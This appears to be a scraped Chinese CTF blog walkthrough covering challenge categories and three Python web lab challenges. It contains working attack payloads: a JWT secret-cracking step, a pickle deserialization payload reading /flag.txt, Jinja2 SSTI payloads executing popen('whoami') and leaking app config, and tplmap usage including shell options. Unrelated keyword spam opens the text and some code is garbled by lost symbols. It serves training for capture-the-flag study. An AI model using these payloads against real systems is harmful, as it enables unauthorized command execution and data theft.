民房做酒店出租网站app,分类信息网站平台的推广,健康门户网站建设内容,手机上如何做mv视频网站这里写目录标题 CTF各大题型简介演示案例:CTF夺旗-Python-支付逻辑JWT反序列化CTF夺旗-Python-Flaskjinja2SSTl模版注入CTF夺旗-Python-格式化字符串漏洞读取对象 涉及资源#xff1a; 我们这篇文章主要讲的是CTF在web渗透测试方向的3个考点
CTF各大… 这里写目录标题 CTF各大题型简介演示案例:CTF夺旗-Python-支付逻辑JWT反序列化CTF夺旗-Python-Flaskjinja2SSTl模版注入CTF夺旗-Python-格式化字符串漏洞读取对象 涉及资源 我们这篇文章主要讲的是CTF在web渗透测试方向的3个考点
CTF各大题型简介
MISC安全杂项全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等覆盖面比较广。我们平时看到的社工类题目给你一个流量包让你分析的题目取证分析题目都属于这类题目。主要考查参赛选手的各种基础综合知识考察范围比较广。
PPC编程类全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写批量处理等有时候用编程去处理问题会方便的多。当然PPC相比ACM来说还是较为容易的。至于编程语言嘛推荐使用Python来尝试。这部分主要考察选手的快速编程能力。
CRYPTO密码学全称Cryptography。题目考察各种加解密技术包括古典加密技术、现代加密技术甚至出题者自创加密技术。实验吧“角斗场”中这样的题目汇集的最多。这部分主要考查参赛选手密码学相关知识点。
REVERSE逆向全称reverse。题目涉及到软件逆向、破解技术等要求有较强的反汇编、反编译扎实功底。需要掌握汇编堆栈、寄存器方面的知识。有好的逻辑思维能力。主要考查参赛选手的逆向分析能力。此类题目也是线下比赛的考察重点。
STEGA隐写全称Steganography。隐写术是我开始接触CTF觉得比较神奇的一类知道这个东西的时候感觉好神奇啊黑客们真是聪明。题目的Flag会隐藏到图片、音频、视频等各类数据载体中供参赛选手获取。载体就是图片、音频、视频等可能是修改了这些载体来隐藏flag也可能将flaq隐藏在这些载体的二进制空白位置。有时候需要你侦探精神足够的强才能发现。此类题目主要考察参赛选手对各种隐写工具、隐写算法的熟悉程度。实验吧“角斗场”的隐写题目在我看来是比较全的以上说到的都有涵盖。新手盆友们可以去了解下。
PWN溢出PWN在黑客俚语中代表着攻破取得权限在CTF比赛中它代表着溢出类的题目其中常见类型溢出漏洞有栈溢出、堆溢出。在CTF比赛中线上比赛会有但是比例不会太重进入线下比赛逆向和溢出则是战队实力的关健。主要考察参与选手漏洞挖掘和利用能力。
WEBwob类WEB应用在今天越来越广泛也是CTF夺旗竞赛中的主要题型题目涉及到常见的Web漏洞诸如注入、XSS、文件包含、代码审计、上传等漏洞。这些题目都不是简单的注入、上传题目至少会有一层的安全过滤需要选手想办法绕过。且Web题目是国内比较多也是大家比较喜欢的题目。因为大多数人开始安全都是从web开始的。
演示案例:
CTF夺旗-Python-支付逻辑JWT反序列化
真题2019 CISCN华北赛区Day1 Web2 WriteUp 全国大学生信息安全竞赛
打开后通过提示 - 寻找LV6 - 购买修改支付逻辑 - 绕过admin限制需修改jwt值 - 爆破jwt密匙 - 重组jwt值成为admin - 购买进入会员中心 - 源码找到文件压缩源码 - Python代码审计反序列化 - 构造读取flag代码进行序列化打印 - 提交获取
题目靶场打开就这样子这个靶场考了很多知识点其中最重要的知识点是python反序列化JWT安全属于java里面的当然python也有它是一个认证机制的漏洞支付逻辑在任何脚本里面都会有这个漏洞是通用的JWT安全和反序列化在PHP里面出现的比较少 根据提示暴破、一定要买到LV6。写一个脚本找到LV6。如下图所示在181页
import requestsfor i in range(1,1000):urlhttp://119.45.216.198:8083/shop?pagestr(i)#print(url)resultrequests,get(url).content.decode(utf-8)if lv6.png in result:print(urlyes)else:print(url|no)pass打开181页找到LV6的购买链接。到这里我们就完成了提示的第一步 点击购买发现价格太高而余额太少不够。这里就涉及到支付逻辑漏洞 前端校验可以在前端修改后端校验就没办法了
发现购买时有一个优惠券尝试在前端修改优惠券折扣点击结算提示“该页面只允许admin访问” 由于目前我们登录的是普通用户此时可以尝试垂直越权。观察数据包发现会话使用的JWT 尝试使用c-jwt-cracker工具爆破JWT秘钥成功得到秘钥1kun
https://github.com/brendan-rius/c-jwt-cracker JWT cracker 接下来使用在线网站进行解密 https://jwt.io/ jwt在线解密 将username值改为admin使用秘钥重新生成JWT成功登录admin账户 查看网页源代码找到新提示 下载www.zip解压缩打开文件发现是python源码 我们学好代码审计思路之后很多东西你只要把这个思路延伸下去就可以了这个时候就可以在网上寻找资料你思路就会很明显了
我们做代码审计必不可少的工具就是把idea给载入进去
在python里面用到这些关键字就会出现反序列化漏洞 使用idea工具打开源码全局搜索漏洞关键字。发现反序列化关键字pickle猜测这里有反序列化漏洞
python漏洞参考https://github.com/bit4woo/python_sec
在代码中出现了对象然后引用对象的实体化触发里面的魔术方法 利用漏洞编写脚本生成payload
import pickle
import urllibclass payload(object):def _reduce_(self):return (eval,(“open(/flag.txt,r).read(),))apickle.dumps(payload())
a urllib.quote(a)
print a由于become输入框是个隐藏框可以F12删除隐藏属性 把隐藏去掉就显示了输入框 输入payload点击一键成为大会员 成功得到flag
CTF夺旗-Python-Flaskjinja2SSTl模版注入
1.ssti模版注入原理解释 我们有时候需要在页面输出一些代码或者输出一些东西的时候如果这个输出东西有变量的话变量引用不好的话那么这个变量传入一些值之后会导致这边形成代码的执行
#/www
from flask import Flask,request,render_template
from jinja2 import Template
app Flask(__name__)
app.config[SECRET] root:passwordapp.route(/)
app.route(/index)
def index():return render_template(index.html,titleSSTI_TEST,namerequest.args.get(name))if __name__ __main__:app.run()!--/www/templates/index.html--
htmlheadtitle{{title}} - cl4y/title/headbodyh1Hello, {{name}} !/h1/body
/html2.如何确定Python-ssti模版注入中间件返回页面关键文字提示等
中间件可通过请求响应头server值判断比如 ServerWerkzeug/0.11.15 python/3.7.0说明后台使用python脚本编写应该想到测试是否有SSTI漏洞
返回页面比如返回Opos!That page doesnt exist
关键字提示比如flask、inja2、mako等 3.如何正确利用ssti注入获取Flag人工工具 1人工判断版本-找利用类-构造Payload-绕过滤等 判定环境支持那些模块、那些库能够使用
http://127.0.0.1:5000/acc?404_url{{%27%27.__class__.__bases__[0].__subclasses__()}}我们找一下os模块os能够执行命令、文件的操作还有file、request模块
http://127.0.0.1:5000/acc?404_url{{%22%22.__class__.__bases__[0].__subclasses__()[128].__init__.__globals__[%27popen%27](%27whoami%27).read()}}第一个是检测第二个就是判断它有没有可用类完了之后就是用payload去攻击它 2工具自动化检测工具tplmap使用 https://github.com/epinna/tplmap 这个是专门搞python的SSTI漏洞不过在CTF比赛中使用这个工具不能直接攻击成功需要你修改一下
Usage: python tplmap.py [options]选项:-h, --help 显示帮助并退出目标:-u URL, --urlURL 目标 URL-X REQUEST, --re.. 强制使用给定的HTTP方法 (e.g. PUT)请求:-d DATA, --data.. 通过POST发送的数据字符串 它必须作为查询字符串: param1value1param2value2-H HEADERS, --he.. 附加消息头 (e.g. Header1: Value1) 多次使用以添加新的消息头-c COOKIES, --co.. Cookies (e.g. Field1Value1) 多次使用以添加新的Cookie-A USER_AGENT, -.. HTTP User-Agent 消息头的值--proxyPROXY 使用代理连接到目标URL检测:--levelLEVEL 要执行的代码上下文转义级别 (1-5, Default: 1)-e ENGINE, --eng.. 强制将后端模板引擎设置为此值-t TECHNIQUE, --.. 技术 R:渲染 T:基于时间的盲注 Default: RT操作系统访问:--os-cmdOS_CMD 执行操作系统命令--os-shell 提示交互式操作系统Shell--uploadUPLOAD 上传本地文件到远程主机--force-overwrite 上传时强制覆盖文件--downloadDOWNL.. 下载远程文件到本地主机--bind-shellBIN.. 在目标的TCP端口上生成系统Shell并连接到它--reverse-shell.. 运行系统Shell并反向连接到本地主机端口模板检查:--tpl-shell 在模板引擎上提示交互式Shell--tpl-codeTPL_C.. 在模板引擎中注入代码常规:--force-levelFO.. 强制将测试级别设置为此值--injection-tag.. 使用字符串作为注入标签 (default *)举例
检测是否有SSTI漏洞如下图发现有漏洞可上传下载文件
命令python tplmap.py -u http://127.0.0.1:5000/acc?404_url 工具只能做为参考其实目标这里也可以命令执行工具误报了
下载文件 命令python tplmap.py -u http://127.0.0.1:5000/acc?404_url --download flag.txt 1.txt 上传文件 命令python tplmap.py -u http://127.0.0.1:5000/acc?404_url --upload flag.txt 1.txt
案例演示 靶场地址https://buuoj.cn/challenges#[WesternCTF2018]shrine
打开发现给出源码-pythoflaskssti-代码分析访问参数,flag位置,过滤等-不能进行正常的路径符合-采用内置函数读取-读取代码中的存储FLAG
页面打开如下直接给出源代码CTF题目都会给你提示的你如果找不到提示说明你没有找对方向 看到flask想到模板注入 可以手工测试 http://5e59d3ff-705b-4ad8-bcce-d9f688ebe3db.node4.buuoj.cn:81/shrine/{{11}} 返回2说明有SSTI漏洞
也可以使用工具测试。由于这里源代码中没有给出参数因此需要在url后面加* 命令python tplmap.py -u http://5e59d3ff-705b-4ad8-bcce-d9f688ebe3db.node4.buuoj.cn:81/shrine/*
这里检测出漏洞但是却不能利用操作。原因是源代码中作了过滤过滤了() 我们可以采用SSTI沙盒逃逸进行绕过去网站找如何绕过括号的payload去进行利用
看源码app.config[‘FLAG’] os.environ.pop(‘FLAG’)推测{undefined{config}}可查看所有app.config内容但是这题设了黑名单[‘config’,‘self’]并且过滤了括号。不过python还有一些内置函数比如url_for和get_flashed_messages
url_for查看全局变量/shrine/{{url_for.__globals__}}
这里申明了很多东西调用函数中间件信息还有获取里面脚本的函数 current_app意思应该是当前app那我们就看当前app下的config/shrine/{{url_for.__globals__[current_app].config}}成功拿到flag
这个脚本运行的时候会加载很多相关python内置的通过命令先获取全局的把储存在里面的flag值给获取到 get_flashed_message同理/shrine/{{get_flashed_messages.__globals__[current_app].config[FLAG]}}
CTF夺旗-Python-格式化字符串漏洞读取对象
格式化字符串漏洞原理
第一种%操作符
第二种string.Template
第三种调用Format方法
第四种f-Strings参考https:/xz.aliyun.com/t/3569 漏洞代码举例 调用Format方法。如下图所示第三个name后面的值可控我们就可以传参获取当前脚本的核心变量flag值 f-Strings。这是python3函数式的新增一种字符串其功能强大可以执行字符串中包含的python表达式
涉及资源
https://jwt.io/ jwt在线解密 https://buuoj.cn/ 比赛平台 https://www.bugku.com/ ctf库 https://www.ctfhub.com/ ctf题 https://www.xuenixiang.com ctf靶场、逆向 https:/xz.aliyun.com/t/3569 Python Web之flask session格式化字符串漏洞 https://xz.aliyun.com/t/7746 SSTI模板注入(PythonJinja2) https://gathub.com/CTFd/CTFd ctf https://github.com/CTFTraining ctf环境库 https://github.com/epinna/tplmap 注入 https://github.com/bit4woo/python_sec python渗透策略目录 https://github.com/brendan-rius/c-jwt-cracker JWT cracker https://www.cnblogs.com/liuxiaowei/p/9039622.html 【Flask】Flask中关于url_for() python漏洞参考https://github.com/bit4woo/python_sec
